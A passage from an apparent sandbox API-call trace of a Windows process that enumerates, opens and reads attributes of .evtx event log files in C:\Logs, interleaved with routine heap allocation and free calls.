(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81860 [0071.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0071.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0071.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.776] AreFileApisANSI () returned 1 [0071.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpUsedDefaultChar=0x0) returned 87 [0071.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.776] AreFileApisANSI () returned 1 [0071.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0071.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81860 [0071.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x81860, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 87 [0071.776] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.776] GetFileType (hFile=0x428) returned 0x1 [0071.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0071.777] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.777] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.777] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.777] CloseHandle (hObject=0x428) returned 1 [0071.777] AreFileApisANSI () returned 1 [0071.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0071.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x812a0 [0071.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x812a0, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 87 [0071.777] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.778] GetFileType (hFile=0x428) returned 0x1 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0071.778] CloseHandle (hObject=0x428) returned 1 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.778] AreFileApisANSI () returned 1 [0071.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0071.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81860 [0071.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x81860, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 87 [0071.778] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.779] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cAlternateFileName="MIA726~1.EVT")) returned 1 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0071.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0071.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0071.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.780] AreFileApisANSI () returned 1 [0071.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 57 [0071.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0071.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0071.780] AreFileApisANSI () returned 1 [0071.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0071.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 57 [0071.780] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.780] GetFileType (hFile=0x428) returned 0x1 [0071.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.781] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.781] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.781] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.781] CloseHandle (hObject=0x428) returned 1 [0071.781] AreFileApisANSI () returned 1 [0071.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0071.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 57 [0071.781] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.781] GetFileType (hFile=0x428) returned 0x1 [0071.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.782] CloseHandle (hObject=0x428) returned 1 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.782] AreFileApisANSI () returned 1 [0071.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69e30 [0071.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 57 [0071.782] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.783] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cAlternateFileName="MI08CB~1.EVT")) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | 